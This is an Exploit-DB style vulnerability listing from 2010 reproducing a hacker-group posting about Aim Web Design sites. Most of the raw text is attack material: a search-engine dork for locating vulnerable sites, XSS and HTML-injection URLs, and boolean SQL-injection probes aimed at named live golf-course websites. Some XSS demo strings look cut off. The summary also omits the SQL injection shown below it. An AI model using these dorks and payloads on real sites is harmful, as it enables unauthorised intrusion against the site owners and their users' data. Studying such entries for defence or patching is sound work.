Aim Web Design Multiple Vulnerabilities

vendor:

Aim Web Design

by:

XroGuE

5.5

CVSS

MEDIUM

Multiple Vulnerabilities

CWE

Product Name: Aim Web Design

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2010

Aim Web Design Multiple Vulnerabilities

The Aim Web Design website is vulnerable to multiple vulnerabilities including XSS Injection and HTML Injection. These vulnerabilities can be exploited to inject malicious code into the website and potentially compromise user data.

Mitigation:

The vendor should patch the vulnerabilities by implementing input validation and sanitization techniques. Users are advised to avoid visiting the affected website until the vulnerabilities are fixed.

Source

Exploit-DB raw data:

=======================================================================
# Aim Web Design Multiple Vulnerabilities
=======================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 #################################### 1
0 I'm XroGuE member from Inj3ct0r Team 1
1 #################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

########################################################################
# Name: Aim Web Design Multiple Vulnerabilities
# Vendor: www.aimwebdesigncheshire.co.uk
# Date: 2010-05-29
# Author: XroGuE
# Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: (-_+)
########################################################################

[+] Dork: inurl:"clubpage.php?id=" & inurl:"coursepage.php?id="
intext:"Web Site design by : Aim Web Design Cheshire"


[+] Vulnerabilities:

newsarticle.php
coursepage.php
addreview.php
clubpage.php


[+] XSS InjecTion Vulnerability:

[+] Demo: http://server/coursepage.php?id="
http://www.2for1golfcourses.co.uk/addreview.php?id=">

########################################################################

[+] HTML InjecTion Vulnerability:

[+] Demo: http://server/coursepage.php?id="<marquee><font color=Blue size=15>XroGuE</font></marquee>
http://www.2for1golfcourses.co.uk/addreview.php?id="><marquee><font color=Blue size=15>XroGuE</font></marquee>

########################################################################

[+] SQL InjecTion Vulnerability:

[+] Demo: http://server/newsarticle.php?id=10 and 1=1 [and 1=2]
http://www.golfgreenfees.com/courses/courses/clubpage.php?id=30 and 1=1 [and 1=2]

########################################################################